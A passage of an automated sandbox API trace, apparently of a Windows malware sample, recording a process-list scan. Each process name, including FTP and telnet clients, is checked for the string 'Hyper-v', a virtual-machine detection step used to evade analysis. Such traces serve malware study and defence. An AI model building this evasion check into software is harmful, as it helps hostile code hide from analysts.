pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0102.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.485] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ee80 [0102.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356ee80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0102.485] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0102.485] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="Hyper-v") returned 0x0 [0102.485] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0102.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.486] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eda8 [0102.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356eda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0102.486] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0102.486] StrStrIA (lpFirst="pending.exe", lpSrch="Hyper-v") returned 0x0 [0102.486] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0102.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.487] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e848 [0102.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x357e848, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0102.487] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0102.487] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="Hyper-v") returned 0x0 [0102.490] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0102.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.491] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f5c0 [0102.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357f5c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0102.491] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0102.491] StrStrIA (lpFirst="swing prefer.exe", lpSrch="Hyper-v") returned 0x0 [0102.491] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0102.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.492] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e870 [0102.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x357e870, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0102.492] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0102.492] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="Hyper-v") returned 0x0 [0102.492] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0102.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.493] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f640 [0102.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357f640, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0102.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0102.493] StrStrIA (lpFirst="nights-attending.exe", lpSrch="Hyper-v") returned 0x0 [0102.493] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0102.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.494] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f060 [0102.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356f060, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0102.494] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0102.494] StrStrIA (lpFirst="installed.exe", lpSrch="Hyper-v") returned 0x0 [0102.494] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0102.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.495] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e898 [0102.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x357e898, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0102.495] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0102.495] StrStrIA (lpFirst="references compounds.exe", lpSrch="Hyper-v") returned 0x0 [0102.495] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0102.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.496] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f4c0 [0102.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357f4c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0102.496] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0102.496] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="Hyper-v") returned 0x0 [0102.496] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0102.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.497] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f5e0 [0102.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357f5e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0102.497] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0102.497] StrStrIA (lpFirst="registered try.exe", lpSrch="Hyper-v") returned 0x0 [0102.497] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0102.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.498] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e9d8 [0102.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357e9d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0102.498] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0102.499] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="Hyper-v") returned 0x0 [0102.499] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0102.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.500] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570500 [0102.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3570500, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0102.500] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0102.500] StrStrIA (lpFirst="invite.exe", lpSrch="Hyper-v") returned 0x0 [0102.500] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0102.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.501] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35705d8 [0102.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35705d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0102.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0102.501] StrStrIA (lpFirst="idol.exe", lpSrch="Hyper-v") returned 0x0 [0102.501] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0102.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.502] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357ea00 [0102.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357ea00, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0102.502] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0102.502] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="Hyper-v") returned 0x0 [0102.502] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0102.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.505] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357ea28 [0102.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357ea28, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0102.505] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0102.505] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="Hyper-v") returned 0x0 [0102.505] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0102.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.507] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570530 [0102.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3570530, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0102.507] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0102.507] StrStrIA (lpFirst="powell_jane.exe", lpSrch="Hyper-v") returned 0x0 [0102.507] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0102.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.508] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f4e0 [0102.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357f4e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0102.508] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0102.508] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="Hyper-v") returned 0x0 [0102.508] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0102.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.509] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570590 [0102.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3570590, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0102.509] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0102.509] StrStrIA (lpFirst="gainedshape.exe", lpSrch="Hyper-v") returned 0x0 [0102.509] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0102.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.511] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f680 [0102.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357f680, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0102.511] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0102.511] StrStrIA (lpFirst="opens-versions.exe", lpSrch="Hyper-v") returned 0x0 [0102.511] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0102.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.512] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357eaf0 [0102.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357eaf0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0102.512] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0102.512] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="Hyper-v") returned 0x0 [0102.512] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0102.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.513] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570890 [0102.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.513] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0102.513] StrStrIA (lpFirst="3dftp.exe", lpSrch="Hyper-v") returned 0x0 [0102.513] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0102.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.514] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f7e0 [0102.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357f7e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0102.514] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0102.514] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="Hyper-v") returned 0x0 [0102.515] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0102.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.516] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35708d8 [0102.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35708d8, cbMultiByte=10, 